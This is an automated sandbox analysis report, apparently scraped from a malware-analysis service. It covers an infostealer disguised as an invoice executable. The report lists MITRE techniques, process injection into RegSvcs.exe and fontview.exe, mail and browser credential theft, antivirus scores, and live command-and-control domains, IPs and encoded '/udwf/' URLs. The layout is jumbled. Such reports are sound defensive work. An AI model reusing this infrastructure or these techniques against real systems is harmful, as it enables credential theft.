            Valid AccountsWindows Management InstrumentationPath Interception512
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1340403 Sample: Invoice_&_SOA_ready_for_dis... Startdate: 10/11/2023 Architecture: WINDOWS Score: 100 28 www.westcoastmedia.marketing 2->28 30 www.tutorwave.online 2->30 32 17 other IPs or domains 2->32 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 7 other signatures 2->46 10 Invoice_&_SOA_ready_for_dispatch.exe 3 2->10         started        signatures3 process4 signatures5 56 Writes to foreign memory regions 10->56 58 Allocates memory in foreign processes 10->58 60 Injects a PE file into a foreign processes 10->60 13 RegSvcs.exe 10->13         started        16 RegSvcs.exe 10->16         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 18 xIXlFDyvSnsfUSfsjsGwj.exe 13->18 injected process8 process9 20 fontview.exe 13 18->20         started        signatures10 48 Tries to steal Mail credentials (via file / registry access) 20->48 50 Tries to harvest and steal browser information (history, passwords, etc) 20->50 52 Writes to foreign memory regions 20->52 54 3 other signatures 20->54 23 xIXlFDyvSnsfUSfsjsGwj.exe 20->23 injected 26 firefox.exe 20->26         started        process11 dnsIp12 34 www.spark-tech-global.xyz 162.0.222.119, 49732, 49733, 49734 ACPCA Canada 23->34 36 www.633922.com 103.120.80.111, 49760, 49761, 49762 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 23->36 38 9 other IPs or domains 23->38

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice_&_SOA_ready_for_dispatch.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
            Invoice_&_SOA_ready_for_dispatch.exe100%AviraHEUR/AGEN.1323731
            Invoice_&_SOA_ready_for_dispatch.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://mozilla.org0/0%URL Reputationsafe
            http://www.westcoastmedia.marketing/udwf/?G0Yxd2Q=XDsu41kr/WE9JT9AScR/+1k0JlKiFIG701T/ujNzDh06TiWTrNXnD44RUNnX/KpbWGAw0lPsPrhbwlOTmOIr6R/DwJG4M7kG+w==&pp=dZa40%Avira URL Cloudsafe
            http://www.littlehappiez.com/udwf/100%Avira URL Cloudmalware
            http://www.littlehappiez.com/udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            http://www.iwhrkc.shop/udwf/?G0Yxd2Q=uaWfHshIK9gqRIt0eR4Tz5qfjwC0uWvEtBcNKoa2GFPJfFEePrXngeKx3tr3rBy7nKvOiQo6TdyP9ywL+/2JVArzIS+tipxZpg==&pp=dZa40%Avira URL Cloudsafe
            http://www.lxdedu.com/udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&vhQT=aV8PeNo0MvDl10%Avira URL Cloudsafe
            http://www.otternaut.live/udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            http://www.tutorwave.online/udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk0%Avira URL Cloudsafe
            http://www.xn--4gq62f8w1alm9b.xyz/udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            http://www.sorenad.com/udwf/?G0Yxd2Q=ealZg/ITvpLJU7YFE/TF+8q+uExFybxcdjgzbBdGHgaAn5MnYWXQDBclabNRkiFFmFTfmTH8N/zDLP0J5EOM1vyD30GW5j90MQ==&pp=dZa40%Avira URL Cloudsafe
            http://www.lxdedu.com/udwf/0%Avira URL Cloudsafe
            http://www.diabloseugene.com/udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            http://www.spark-tech-global.xyz/udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03100%Avira URL Cloudmalware
            http://www.aifuturesummit.com/udwf/?G0Yxd2Q=Kq0jCDSsi+gLhYagIFFza5XYEfPHq1wckJYs2pUOQJ4UOA08Cv/iplAOJSGKGG8twuAeLLQOU/XInoWNJu0WYoAEZtaSTts9sg==&vhQT=aV8PeNo0MvDl10%Avira URL Cloudsafe
            http://www.sorenad.com/udwf/0%Avira URL Cloudsafe
            http://www.tutorwave.online/udwf/100%Avira URL Cloudmalware
            http://www.633922.com/udwf/0%Avira URL Cloudsafe
            http://www.xn--4gq62f8w1alm9b.xyz/udwf/100%Avira URL Cloudmalware
            http://www.lxdedu.com/udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&pp=dZa40%Avira URL Cloudsafe
            http://www.bellcom.media/udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1100%Avira URL Cloudmalware
            http://www.westcoastmedia.marketing0%Avira URL Cloudsafe
            http://www.diabloseugene.com/udwf/100%Avira URL Cloudmalware
            http://www.autokit.help/udwf/0%Avira URL Cloudsafe
            http://www.iwhrkc.shop/udwf/0%Avira URL Cloudsafe
            http://www.westcoastmedia.marketing/udwf/0%Avira URL Cloudsafe
            http://www.bellcom.media/udwf/100%Avira URL Cloudmalware
            http://www.spark-tech-global.xyz/udwf/100%Avira URL Cloudmalware
            http://www.otternaut.live/udwf/100%Avira URL Cloudmalware
            http://www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa40%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.diabloseugene.com
            		199.59.243.225
            		truefalse
              		unknown
              www.sorenad.com
              		136.243.218.18
              		truefalse
                		unknown
                5mm70f.shop
                		8.212.101.233
                		truefalse
                  		unknown
                  parkingpage.namecheap.com
                  		91.195.240.19
                  		truefalse
                    		high
                    www.spark-tech-global.xyz
                    		162.0.222.119
                    		truetrue
                      		unknown
                      www.633922.com
                      		103.120.80.111
                      		truefalse
                        		unknown
                        www.xn--4gq62f8w1alm9b.xyz
                        		35.227.246.104
                        		truefalse
                          		unknown
                          aifuturesummit.com
                          		84.32.84.32
                          		truefalse
                            		unknown
                            tutorwave.online
                            		84.32.84.32
                            		truefalse
                              		unknown
                              www.lxdedu.com
                              		168.76.252.99
                              		truefalse
                                		unknown
                                shops.myshopify.com
                                		23.227.38.74
                                		truefalse
                                  		unknown
                                  www.bellcom.media
                                  		91.195.240.123
                                  		truefalse
                                    		unknown
                                    www.littlehappiez.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.iwhrkc.shop
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.westcoastmedia.marketing
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.autokit.help
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.tutorwave.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.otternaut.live
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.aifuturesummit.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.tutorwave.online/udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.westcoastmedia.marketing/udwf/?G0Yxd2Q=XDsu41kr/WE9JT9AScR/+1k0JlKiFIG701T/ujNzDh06TiWTrNXnD44RUNnX/KpbWGAw0lPsPrhbwlOTmOIr6R/DwJG4M7kG+w==&pp=dZa4false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.otternaut.live/udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.iwhrkc.shop/udwf/?G0Yxd2Q=uaWfHshIK9gqRIt0eR4Tz5qfjwC0uWvEtBcNKoa2GFPJfFEePrXngeKx3tr3rBy7nKvOiQo6TdyP9ywL+/2JVArzIS+tipxZpg==&pp=dZa4false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.westcoastmedia.marketing/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.littlehappiez.com/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.lxdedu.com/udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autokit.help/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.littlehappiez.com/udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.xn--4gq62f8w1alm9b.xyz/udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.iwhrkc.shop/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sorenad.com/udwf/?G0Yxd2Q=ealZg/ITvpLJU7YFE/TF+8q+uExFybxcdjgzbBdGHgaAn5MnYWXQDBclabNRkiFFmFTfmTH8N/zDLP0J5EOM1vyD30GW5j90MQ==&pp=dZa4false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.diabloseugene.com/udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.diabloseugene.com/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.lxdedu.com/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.spark-tech-global.xyz/udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.aifuturesummit.com/udwf/?G0Yxd2Q=Kq0jCDSsi+gLhYagIFFza5XYEfPHq1wckJYs2pUOQJ4UOA08Cv/iplAOJSGKGG8twuAeLLQOU/XInoWNJu0WYoAEZtaSTts9sg==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tutorwave.online/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.bellcom.media/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.sorenad.com/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.otternaut.live/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.633922.com/udwf/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lxdedu.com/udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&pp=dZa4false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xn--4gq62f8w1alm9b.xyz/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.spark-tech-global.xyz/udwf/false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.bellcom.media/udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1false
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4false
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabfontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://www.namesilo.com/domain/search-domains?query=bellcom.mediafontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://www.westcoastmedia.marketingxIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3737944932.000000000505E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://img.sedoparking.comfontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://track.uc.cn/collectfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.west.cn/services/mail/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.namesilo.comfontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.comfontview.exe, 0000000C.00000002.3736597685.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000036FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.namecheap.com/domains/registration/results/?domain=westcoastmedia.marketingfontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://hm.baidu.com/hm.js?fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.west.cn/cloudhost/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.namecheap.com/domains/registration/results/?domain=autokit.helpfontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://img.sedoparking.com/templates/bg/NameSiloLogo.pngfontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://mozilla.org0/fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://www.west.cn/ykj/view.asp?domain=633922.comfontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://crash-reports.mozilla.com/submit?id=fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.west.cn/services/webhosting/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.west.cn/services/domain/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.ecosia.org/newtab/fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03fontview.exe, 0000000C.00000002.3736597685.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003248000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://www.sedo.com/services/parking.php3xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ac.ecosia.org/autocomplete?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.namecheap.com/domains/registration/results/?domain=otternaut.livefontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
